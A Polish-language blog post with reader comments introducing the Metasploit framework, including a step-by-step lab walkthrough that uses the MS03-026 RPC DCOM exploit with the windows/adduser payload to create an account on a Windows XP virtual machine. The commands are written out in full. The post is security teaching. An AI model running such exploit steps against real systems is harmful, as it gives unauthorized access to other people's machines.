Strona używa cookies (ciasteczek). Dowiedz się więcej o celu ich używania i zmianach ustawień. Korzystając ze strony wyrażasz zgodę na używanie cookies, zgodnie z aktualnymi ustawieniami przeglądarki.    X

Metasploit- krótkie wprowadzenie

Zapewne nie wszyscy słyszeli co to dokładnie jest więc trochę wstępu. Metasploit jest to narzędzie open source służące do testów penetracyjnych i łamania zabezpieczeń. Posiada imponującą bazę gotowych exploitów (wybaczcie ale będę używał tej nazwy) i posiada interfejs dzięki któremu można przygotować własne na bazie istniejących komponentów. Oczywiście najbardziej praktycznym zastosowaniem Metasploit jest testowanie luk bezpieczeństwa w systemach, choć niektórzy mogą używać go także do niecnych celów takich jak na przykład ataki bruteforce lub DOS.

Exploity dzielimy na aktywne i pasywne.

Aktywne to takie, które działają na hoście, aż do wykonania określonego działania i dopiero wtedy kończą swoja aktywność. Charakteryzują się:

  • moduły brute-force zakończą się kiedy zostanie uzyskany dostęp do atakowanego systemu
  • moduły przestają działać kiedy pojawią się błędy
  • można także nakazać modułom działać w tle, używamy do tego parametru „-j” na końcu komendy

Pasywne to takie, które uaktywniają się dopiero wtedy nastąpi połączenie z hostem. Zazwyczaj używane są przy atakach na przeglądarki www, klientów poczty, ftp itd.

Metasploit używamy poprzez konsole i wygląda ona tak:

Poniżej zademonstruje jak utworzyć konto użytkownika przy użyciu exploitu w RPC DCOM w Windows XP.

1. W konsoli wpisujemy „search dcom” aby znalezć interesujący nas exploit. Jak widać na obrazku poniżej mamy kilka do wyboru:

2. Użyję drugiego exploitu na liście.

Wpisujemy w konsole:

use exploit/windows/dcerpc/ms03_026_dcom

następnie „show options” aby zobaczyć co dokładnie możemy zrobić z tym exploitem.

3. Używamy parametru RHOST aby pokazać cel ataku. W moim przypadku to adres wirtualnej maszyny z Windows XP. Wpisujemy komendę:

set RHOST 192.168.1.148

Następnie używamy komendy:

set PAYLOAD

Warto wspomnieć, że jeśli naciśniemy TAB po komendzie otrzymamy pełną listę działań jakie możemy podjąć.

W tym przypadku użyję „windows/adduser”, poprzez pełną komendę:

set PAYLOAD windows/adduser

Jak widać na poniższym obrazku, jeśli użyjemy tego exploita, zostanie utworzone konto o nazwie: Metasploit oraz haśle: Metasploit$1

4. No to do dzieła. Wpisujemy ostatnią komendę:

exploit

Jak widać połączenie zostało nawiązane i została podjęta próba ataku na Windows XP.

A oto wynik:

Oczywiście była to tylko krótka prezentacja możliwości Metasploit. W tym przypadku użyłem exploita z 2003 roku atakując system Windows XP SP1.

Metasploit oferuje o wiele bardziej wyrafinowane metody ataku, takie jak omijanie zabezpieczeń antywirusowych, tworzenie trojanów i wirusów. Przy odpowiedniej wiedzy jest to naprawdę bardzo potężne narzędzie.
 

bezpieczeństwo

Komentarze

0 nowych
LonngerM   11 #1 07.12.2012 09:13

Bardzo fajnie opisany temat dla takiego laika w temacie exploitów jak ja.Niestety stąpasz po niebezpiecznym gruncie:P Co jak co, ale kto się zajmuje testami pewnie to potrafi, a reszta tego nie zna i znać nie powinna;) Jak się jakieś dzieciaki do tego dorwą, to mogą się zabawić w "hakierstwo".

tfl   8 #2 07.12.2012 09:22

"Metasploit jest to narzędzie open source służące do testów penetracyjnych i łamania zabezpieczeń."

Niestety, gdyby tak bylo, to posiadanie tej aplikacji w naszym kraju byloby niezgodne z prawem. Dlatego metasploit jest nardziem tylko do testowania, a nie do lamania zabezpieczen.



A panowie moderatorzy nie dostrzegli ze wpis jest nieczytelny przez fatalne kodowanie?

GBM MODERATOR BLOGA  19 #3 07.12.2012 09:25

O, fajnie - miło że metasploit pojawia na łamach blogów DP, to jest naprawdę bardzo dobrze narzędzie :>

@LonngerM: Nie do końca, tutaj nie ma jakiś niesamowitych porad, umożliwiających włamanie się na windowsa swojego nauczyciela ;)
Natomiast, w sieci jest tego mnóstwo, trzeba tylko dobrze szukać i znać angielski - więc i tak, dla chcącego nic trudnego.

Frankfurterium   9 #4 07.12.2012 09:51

Wspomnieć należy, że Metasploit ma też prosty interfejs graficzny pozwalanie na testowanie zabezpieczeń przy użyciu niemal wyłącznie myszki. Na Windowsie (być może nie tylko) funkcjonalności można jeszcze powiększyć nakładką Armitage.


Tak zupełnie na boku - trochę przeraża mnie dostępność i łatwość użycia takich narzędzi. Parę lat temu w ramach uczelnianych laboratoriów miałem przetestować zabezpieczenia (czyt. włamać się) do systemu XP (w pełni zaktualizowanego). Dzięki znalezionym "step by step" instrukcjom (nawet polskojęzycznym) sprawa była banalna. Grupy testujące Windowsa 7 i któregoś Linuksa miały trudniej, ale też dopięły swego. Istnieją też głupoodporne programy, gdzie wystarczy wpisać zakres IP do przeskanowania i wcisnąć odpowiedni przycisk - aplikacja sama znajdzie ofiary i zastosuje odpowiednie exploity. Świat sam prosi się o script kiddies...

fragman78   4 #5 07.12.2012 11:24

@tfl
Już poprawiłem uciekł jeden nawias kwadratowy :D

saturno   9 #6 07.12.2012 11:35

@GBM | 07.12.2012 9:25

//Natomiast, w sieci jest tego mnóstwo, trzeba tylko dobrze szukać i znać angielski - więc i tak, dla chcącego nic trudnego.//

To że coś można dość łatwo znaleźć w sieci wcale nie znaczy, że jest to dobre i należy to rozpowszechniać na prawo i lewo.

fragman78   4 #7 07.12.2012 11:46

Nie popadajmy tutaj w paranoje. Metasploit to bardzo dobre narzędzie do przeprowadzania "testów bezpieczeństwa" ale trzeba tutaj mieć choć trochę pojęcia o systemach i samym Metasploit. Mysle ze ktoś kto nie ma doświadczenia, nie zrobi z tego żadnego użytku. Istnieją oczywiście graficzne nakładki na Metasploit ale samo zainstalowanie takowej nie gwarantuje sukcesu. Mi osobiście nie udało się w ogóle jednej z takich nakładek uruchomić ze względu na problemy z połączeniem z baza Metasploit.
Panowie, ja bym się nie przejmował bo nie wygląda to tak różowo i małolaty bez doświadczania nie będą tego używać, bo po prostu nie będą wiedzieli jak.
Podałem tutaj bardzo prosty przykład użycia Metasploit. Prawdziwe mistrzostwo polega na takim użyciu aby ominąć zabezpieczenia antywirusowe, zaporę systemowa i "wstrzyknięciu" złośliwego kodu do systemu. Wszystko jest to możliwe z odpowiednia wiedza.
Oczywiście dochodzi tutaj problem moralny... bardzo dobrze wiem w jaki sposób ominąć antywirusa i zaporę, wiem jak włamać się do niejednego forum czy strony, bo nie są aktualizowane. Ja po prostu tego nie robię bo nie mam w tym "fanu". Ale to już zależy od indywidualnego podejścia do problemu...

Autor edytował komentarz.
Frankfurterium   9 #8 07.12.2012 12:30

No nie wiem. Skoro ja dałem radę, to poradzi sobie każdy z krztą samozaparcia :P Zwłaszcza że windowsowa (nawet darmowa) wersja Measploita domyślnie instaluje się z GUI. Wiedzy do wyboru i konfiguracji odpowiedniego pluginu nie trzeba mieć żadnej - na ogólnodostępnych stronach można znaleźć nawet poradniki z obrazkami. Pewnie, że wtedy to nie haking/cracking, tylko gówniarska zabawa, ale skutek tak czy siak może być nieciekawy.

GBM MODERATOR BLOGA  19 #9 07.12.2012 18:22

@saturno: Oj no, przecież "poszukać dobrze", a "znaleźć łatwo" - to nie jest to samo ;)

Wiadomo że jak będziesz "szukał łatwo" to znajdziesz byle co. Natomiast jak "poszukasz dobrze" to znajdziesz coś odpowiedniego pod względem merytorycznym ;)

underface   14 #10 07.12.2012 23:33

@tfl jak wrzuciłam to było ok z tego co pamiętam, ale ręki uciąć sobie nie dam

jaredj   9 #11 10.12.2012 14:43

To że ktoś napisze, że nóż służy do krojenia i smarowania chleba ale można również wrazić takowy w klatę piersiową jakiegoś osobnika nie znaczy, że dajemy przyzwolenie na coś takiego. Nie popadajmy w paranoję.
Wielce interesującym jest, że część narzędzi przeznaczonych do testowania zabezpieczeń jest zakazana w niektórych krajach (np Niemcy z tego co słyszałem).

  #12 25.04.2015 10:24

a jakie to programy, bom ciekaw

  #13 04.11.2015 20:37

@tfl: a czym są testy penetracyjne jak nie łamaniem zabezpieczeń? i późniejszym szukaniu sposobu na zalatanie